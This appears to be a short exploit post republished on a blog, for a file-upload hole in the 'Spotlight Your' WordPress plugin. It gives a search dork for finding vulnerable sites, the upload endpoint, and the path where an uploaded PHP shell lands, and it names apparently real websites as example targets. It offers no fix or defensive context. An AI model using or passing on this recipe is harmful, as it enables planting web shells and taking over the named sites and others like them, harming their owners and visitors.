Wordpress Plugins Spotlight Your Upload Vulnerability



Exploit Title: Wordpress Plugins Spotlight Your Upload Vulnerability

Google Dork: inurl:"/wp-content/plugins/spotlightyour/"

Date: 18/11/2012

Locations: Banjarmasin, Indonesia

Author: ovanIsmycode & walangkaji

Contact: rootx@thecrowscrew.org & walangkaji@thecrowscrew.org

Software Link: http://www.spotlightyour.com

################################################################################?#################
[+] POC

Exp. Target :

http://domain.com/wp-content/plugins/spotlightyour/

Exploit :
- /monetize/upload/index.php

Shell Access :

http://domain.com/wp-content/uploads/[year]/[month]/[search your shell].php

Examples
http://www.buyusadeals.com/wp-content/pl.../index.php
http://shopping.businessminister.com/wp-...ze/upload/

Share this

Related Posts

Previous
Next Post »

:)
:(
hihi
:-)
:D
=D
:-d
;(
;-(
@-)
:P
:o
:>)
(o)
:p
:-?
(p)
:-s
(m)
8-)
:-t
:-b
b-(
:-#
=p~
$-)
(y)
(f)
x-)
(k)
(h)
cheer